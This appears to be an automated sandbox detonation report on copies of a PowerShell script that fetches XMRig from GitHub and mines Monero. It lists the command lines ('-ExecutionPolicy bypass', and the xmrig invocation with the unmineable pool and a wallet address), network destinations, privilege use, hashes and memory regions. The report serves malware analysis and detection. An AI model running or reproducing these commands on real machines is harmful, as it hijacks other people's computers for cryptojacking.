2024-05-27 00:27

Reported

2024-05-27 06:07

Platform

win11-20240508-en

Max time kernel

1798s

Max time network

1758s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/3564-0-0x00007FFF13FF3000-0x00007FFF13FF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_efuheam3.ow5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3564-9-0x000001FA4ADD0000-0x000001FA4ADF2000-memory.dmp

memory/3564-10-0x00007FFF13FF0000-0x00007FFF14AB2000-memory.dmp

memory/3564-11-0x00007FFF13FF0000-0x00007FFF14AB2000-memory.dmp

memory/3564-12-0x00007FFF13FF0000-0x00007FFF14AB2000-memory.dmp

memory/3564-14-0x000001FA4AE40000-0x000001FA4AE52000-memory.dmp

memory/3564-15-0x000001FA4AE20000-0x000001FA4AE2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4628-46-0x0000020C54580000-0x0000020C545A0000-memory.dmp

memory/4628-47-0x0000020C55D80000-0x0000020C55DA0000-memory.dmp

memory/4628-48-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/3564-49-0x00007FFF13FF0000-0x00007FFF14AB2000-memory.dmp

memory/4628-50-0x0000020C55DA0000-0x0000020C55DC0000-memory.dmp

memory/4628-51-0x0000020C55DC0000-0x0000020C55DE0000-memory.dmp

memory/3564-53-0x00007FFF13FF3000-0x00007FFF13FF5000-memory.dmp

memory/4628-52-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-54-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-57-0x0000020C55DC0000-0x0000020C55DE0000-memory.dmp

memory/4628-56-0x0000020C55DA0000-0x0000020C55DC0000-memory.dmp

memory/4628-55-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-58-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-59-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-60-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-61-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-62-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-63-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-64-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-65-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-66-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-67-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-68-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-69-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-70-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-71-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-72-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-73-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-74-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-75-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-76-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-77-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-78-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-79-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-80-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-81-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-82-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-83-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-84-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-85-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-86-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-87-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-88-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-89-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-90-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-91-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-92-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-93-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-94-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-95-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-96-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-97-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-98-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-99-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-100-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-101-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-102-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-103-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-104-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-105-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-106-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-107-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-108-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-109-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-110-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-111-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-112-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-113-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-114-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-115-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

memory/4628-116-0x00007FF76D710000-0x00007FF76E343000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:13

Platform

win11-20240508-en

Max time kernel

1800s

Max time network

1775s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
NL 52.111.243.30:443 tcp

Files

memory/2016-0-0x00007FFF60E53000-0x00007FFF60E55000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0f12x4pg.2o1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2016-9-0x00000168EEE00000-0x00000168EEE22000-memory.dmp

memory/2016-10-0x00007FFF60E50000-0x00007FFF61912000-memory.dmp

memory/2016-11-0x00007FFF60E50000-0x00007FFF61912000-memory.dmp

memory/2016-12-0x00007FFF60E50000-0x00007FFF61912000-memory.dmp

memory/2016-14-0x00000168EF2F0000-0x00000168EF302000-memory.dmp

memory/2016-15-0x00000168EEE70000-0x00000168EEE7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1572-46-0x000001A241B60000-0x000001A241B80000-memory.dmp

memory/1572-47-0x000001A241BA0000-0x000001A241BC0000-memory.dmp

memory/1572-48-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/2016-49-0x00007FFF60E53000-0x00007FFF60E55000-memory.dmp

memory/2016-50-0x00007FFF60E50000-0x00007FFF61912000-memory.dmp

memory/1572-52-0x000001A241BE0000-0x000001A241C00000-memory.dmp

memory/1572-51-0x000001A241BC0000-0x000001A241BE0000-memory.dmp

memory/2016-54-0x00007FFF60E50000-0x00007FFF61912000-memory.dmp

memory/1572-53-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-55-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-56-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-57-0x000001A241BC0000-0x000001A241BE0000-memory.dmp

memory/1572-58-0x000001A241BE0000-0x000001A241C00000-memory.dmp

memory/1572-59-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-60-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-61-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-62-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-63-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-64-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-65-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-66-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-67-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-68-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-69-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-70-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-71-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-72-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-73-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-74-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-75-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-76-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-77-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-78-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-79-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-80-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-81-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-82-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-83-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-84-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-85-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-86-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-87-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-88-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-89-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-90-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-91-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-92-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-93-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-94-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-95-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-96-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-97-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-98-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-99-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-100-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-101-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-102-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-103-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-104-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-105-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-106-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-107-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-108-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-109-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-110-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-111-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-112-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-113-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-114-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-115-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-116-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

memory/1572-117-0x00007FF796F60000-0x00007FF797B93000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:14

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1744s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 155.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 31.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 10.173.189.20.in-addr.arpa udp

Files

memory/5040-0-0x00007FFFEFE53000-0x00007FFFEFE55000-memory.dmp

memory/5040-1-0x000001CFD7AB0000-0x000001CFD7AD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yakfyvsk.1ls.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5040-11-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp

memory/5040-12-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp

memory/5040-14-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp

memory/5040-15-0x000001CFD7DF0000-0x000001CFD7E02000-memory.dmp

memory/5040-16-0x000001CFD7AE0000-0x000001CFD7AEA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3524-47-0x00000169FD400000-0x00000169FD420000-memory.dmp

memory/3524-48-0x0000016A8F9D0000-0x0000016A8F9F0000-memory.dmp

memory/3524-49-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-52-0x0000016A90040000-0x0000016A90060000-memory.dmp

memory/3524-50-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-51-0x0000016A90020000-0x0000016A90040000-memory.dmp

memory/5040-53-0x00007FFFEFE53000-0x00007FFFEFE55000-memory.dmp

memory/5040-54-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp

memory/3524-55-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-56-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-57-0x0000016A90020000-0x0000016A90040000-memory.dmp

memory/3524-58-0x0000016A90040000-0x0000016A90060000-memory.dmp

